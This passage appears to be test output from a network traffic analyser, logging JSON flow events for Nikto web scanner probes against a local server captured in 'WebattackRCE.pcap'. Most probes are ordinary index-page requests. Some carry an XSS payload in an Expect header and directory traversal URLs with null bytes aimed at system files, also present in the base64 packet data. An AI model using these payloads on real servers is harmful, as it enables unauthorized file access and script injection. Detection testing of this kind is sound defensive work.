{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1576420276824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276824,"pkt":"AAAAAAAAAAAAAAAACABFAADJPphAAEAG\/ZR\/AAABfwAAAcJWH5C0BwahLC3FVoAYAED+vQAAAQEICp1m+4CdZvuAR0VUIC9kZWZhdWx0LmFzcHggSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1576420276825,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276825,"pkt":"AAAAAAAAAAAAAAAACABFAADIFrxAAEAGJXJ\/AAABfwAAAcJYH5C2Ei6NIzroBYAYAED+vAAAAQEICp1m+4GdZvuBR0VUIC9kZWZhdWx0Lmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1576420276827,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276827,"pkt":"AAAAAAAAAAAAAAAACABFAADFTUVAAEAG7ut\/AAABfwAAAcJaH5CLBXV23SQCI4AYAED+uQAAAQEICp1m+4OdZvuDR0VUIC9pbmRleC5kbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1576420276828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276828,"pkt":"AAAAAAAAAAAAAAAACABFAADICi9AAEAGMf9\/AAABfwAAAcJcH5By6zIbQafp54AYAED+vAAAAQEICp1m+4SdZvuER0VUIC9pbmRleC5qaHRtbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1576420276829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276829,"pkt":"AAAAAAAAAAAAAAAACABFAADG08RAAEAGaGt\/AAABfwAAAcJeH5AOKuv2Y8ch84AYAED+ugAAAQEICp1m+4WdZvuFR0VUIC9pbmRleC5qc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1576420276832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276832,"pkt":"AAAAAAAAAAAAAAAACABFAADGiDJAAEAGs\/1\/AAABfwAAAcJgH5Cj8LAJpHctpoAYAED+ugAAAQEICp1m+4edZvuHR0VUIC9pbmRleC54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1576420276834,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420276834,"pkt":"AAAAAAAAAAAAAAAACABFAADiGX1AAEAGIpd\/AAABfwAAAcJkH5BjVCFE0UHCd4AYAED+1gAAAQEICp1m+4qdZvuKR0VUIC9pbmRleCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om5lZ290aWF0ZSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdDogYXBwbGljYXRpb24vd2hhdGV2ZXI7IHE9MS4wDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:negotiate)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1576420276835,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276835,"pkt":"AAAAAAAAAAAAAAAACABFAADKANNAAEAGO1l\/AAABfwAAAcJmH5BoODjpUSa4iYAYAED+vgAAAQEICp1m+4udZvuLR0VUIC9+YmluIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGV1c2Vyczoga25vd24gdXNlcikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1576420276837,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420276837,"pkt":"AAAAAAAAAAAAAAAACABFAADlgjNAAEAGud1\/AAABfwAAAcJoH5AFkroJ2Lkky4AYAED+2QAAAQEICp1m+42dZvuNR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KRXhwZWN0OiA8c2NyaXB0PmFsZXJ0KHhzcyk8L3NjcmlwdD4NClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGVfZXhwZWN0X3hzcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1576420276839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1576420276839,"pkt":"AAAAAAAAAAAAAAAACABFAAEW4vNAAEAGWOx\/AAABfwAAAcJqH5CF6NrJzvbnOoAYAED\/CgAAAQEICp1m+4+dZvuOR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvYm9vdC5pbmklMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRpcmVjdG9yeSB0cmF2ZXJzYWwgY2hlY2spDQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1576420276840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1576420276840,"pkt":"AAAAAAAAAAAAAAAACABFAAEXDe5AAEAGLfF\/AAABfwAAAcJsH5C64jXXMX558oAYAED\/CwAAAQEICp1m+5CdZvuQR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL2hvc3RzJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 